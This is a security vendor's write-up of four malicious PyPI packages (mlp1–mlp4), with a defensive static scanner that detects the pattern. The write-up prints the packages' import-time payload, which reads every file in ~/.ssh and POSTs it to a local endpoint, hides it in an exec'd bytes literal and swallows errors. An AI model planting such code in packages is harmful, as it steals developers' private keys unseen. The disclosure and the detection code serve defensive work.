Four malicious Python packages read your SSH keys

Reported Jan 04, 2022 by Ashish Bijlani

Package: mlp2
Tags: leaks SSH keys, malicious
Description: "This is an example package to demonstrate a malicious code inside"
Date: 25 Apr, 2021
PyPI versions: 4
Author: mlp2 (mlp2@gmail.com)
Dependencies: 2

Our static analysis module flagged four packages: mlp1, mlp2, mlp3, and mlp4. We took a closer look at the code, in particular the statements our technology flagged as "risky", and found that the packages are indeed malicious. Here we discuss our findings.

At Ossillate, we are building a large-scale security analysis platform that vets PyPI packages for software supply chain attacks. Our free CLI and CI/CD tools help developers adopt pre-vetted third-party open-source packages and ship faster.

Our technology-generated report shows a call to the exec API in the package's __init__.py. Fig 1 shows an excerpt from that file.

    # The payload is stored as a bytes literal rather than as plain source,
    # then decoded and run with exec() when the package is imported.
    data = b"""
    import os
    import requests
    ssh_dir = os.path.join(os.path.expanduser('~'), '.ssh')
    files = os.listdir(ssh_dir)
    all_keys = ''
    for file in files:
        file_path = os.path.join(ssh_dir, file)
        # Read each file in ~/.ssh and append its path and contents; the bare
        # except hides any failure from the user.
        try:
            with open(file_path) as f:
                content = f.read()
                all_keys += file_path + '\\n'
                all_keys += content
                all_keys += '~' * 80 + '\\n'
        except:
            pass
        # POST everything collected so far to the collection endpoint
        # (localhost in this version); errors are again swallowed.
        try:
            requests.post('https://127.0.0.1:4141', data=all_keys)
        except:
            pass
    """
    exec(data.decode())

Fig 1. __init__.py reads SSH keys and POSTs them

Because __init__.py runs implicitly whenever the package is imported, an attacker can use one of these packages as a dependency to mount the attack: simply importing it runs the payload, with no function call required. As Fig 1 shows, the code reads every file in the user's ~/.ssh directory (private keys included) and POSTs the concatenated contents to 127.0.0.1 on port 4141. In this version the destination is localhost, in keeping with the package's own description of itself as a demonstration, but the same code with a remote URL would exfiltrate the keys, and the bare except blocks ensure that nothing surfaces to the user either way. Storing the code as a bytes literal and running it through exec() is also what keeps the imports of os and requests out of the visible module source.
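The following is a minimal version of the kind of static check that flags this pattern. It is an added illustration, not Ossillate's scanner and not code from the mlp packages: it parses a module with Python's ast module, reports exec/eval and network calls, distinguishes statements that run at import time from those inside functions, and re-parses any string or bytes literal that itself looks like Python, so a payload hidden in a bytes literal is inspected without ever being executed. SAMPLE_INIT_PY is a constructed stand-in with the same shape as Fig 1, and the lists of call names and sensitive paths are assumptions chosen for the example.

```python
import ast
from typing import List, Optional

# Constructed sample standing in for the flagged __init__.py: same shape as
# Fig 1 (payload stored as bytes, decoded and exec'd at import), not the
# package's actual source. It is only parsed here, never executed.
SAMPLE_INIT_PY = r'''
data = b"""
import os
import requests
ssh_dir = os.path.join(os.path.expanduser('~'), '.ssh')
for file in os.listdir(ssh_dir):
    requests.post('https://127.0.0.1:4141', data=open(os.path.join(ssh_dir, file)).read())
"""
exec(data.decode())
'''

# Assumed signal lists for this example; a real scanner would carry many more.
DYNAMIC_EXEC = {"exec", "eval"}
NETWORK_CALLS = {"post", "get", "put", "urlopen", "create_connection"}
SENSITIVE_PATHS = (".ssh", ".aws", ".gnupg", "id_rsa", "id_ed25519")
MAX_PAYLOAD_DEPTH = 3  # how many layers of literal-in-literal payloads to unwrap


def _call_name(node: ast.Call) -> str:
    """Name of the called function, whether a bare name or an attribute."""
    f = node.func
    if isinstance(f, ast.Name):
        return f.id
    if isinstance(f, ast.Attribute):
        return f.attr
    return ""


def _nested_ids(tree: ast.AST) -> set:
    """ids of every node inside a def/lambda/class body, i.e. not run on import."""
    nested = set()
    for node in ast.walk(tree):
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.Lambda, ast.ClassDef)):
            nested.update(id(sub) for sub in ast.walk(node))
    return nested


def _parse_payload(text: str) -> Optional[ast.Module]:
    """Parse a literal as Python; return the tree only if it imports or calls something."""
    try:
        tree = ast.parse(text)
    except (SyntaxError, ValueError):
        return None
    if any(isinstance(n, (ast.Import, ast.ImportFrom, ast.Call)) for n in ast.walk(tree)):
        return tree
    return None


def _scan_tree(tree: ast.AST, label: str, depth: int) -> List[str]:
    nested = _nested_ids(tree)
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            where = "inside a function" if id(node) in nested else "at import time"
            if name in DYNAMIC_EXEC:
                findings.append(f"{label}:{node.lineno}: {name}() {where}")
            elif name in NETWORK_CALLS:
                findings.append(f"{label}:{node.lineno}: network call {name}() {where}")
        elif isinstance(node, ast.Constant) and isinstance(node.value, (str, bytes)):
            text = node.value.decode("utf-8", "replace") if isinstance(node.value, bytes) else node.value
            payload = _parse_payload(text) if depth < MAX_PAYLOAD_DEPTH else None
            if payload is not None:
                # The literal is itself a Python program: scan it as a nested module.
                findings.append(f"{label}:{node.lineno}: literal holds executable Python, scanning it")
                findings.extend(_scan_tree(payload, f"{label}<payload@{node.lineno}>", depth + 1))
                continue
            for p in SENSITIVE_PATHS:
                if p in text:
                    findings.append(f"{label}:{node.lineno}: literal references {p!r}")
                    break
    return findings


def scan_source(src: str, label: str = "__init__.py") -> List[str]:
    """Report dynamic execution, network calls and sensitive-path strings in a module."""
    return _scan_tree(ast.parse(src), label, 0)


def flag_package(src: str) -> bool:
    """True when exec/eval runs at import time alongside a network or sensitive-path signal."""
    findings = scan_source(src)
    import_time_exec = any(("exec()" in f or "eval()" in f) and "at import time" in f for f in findings)
    exfil_signal = any("network call" in f or "literal references" in f for f in findings)
    return import_time_exec and exfil_signal


if __name__ == "__main__":
    for line in scan_source(SAMPLE_INIT_PY):
        print(line)
    print("flagged:", flag_package(SAMPLE_INIT_PY))
```

Run against the sample, the scanner reports the exec() call at import time on line 9 of the outer module, and inside the payload it finds the '.ssh' literal and the requests.post() call, which is enough for flag_package to return True; an exec() that only lives inside a function body is reported but not treated as an import-time risk on its own.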

We reported our findings to the PyPI maintainers, and the packages were removed as of January 2022.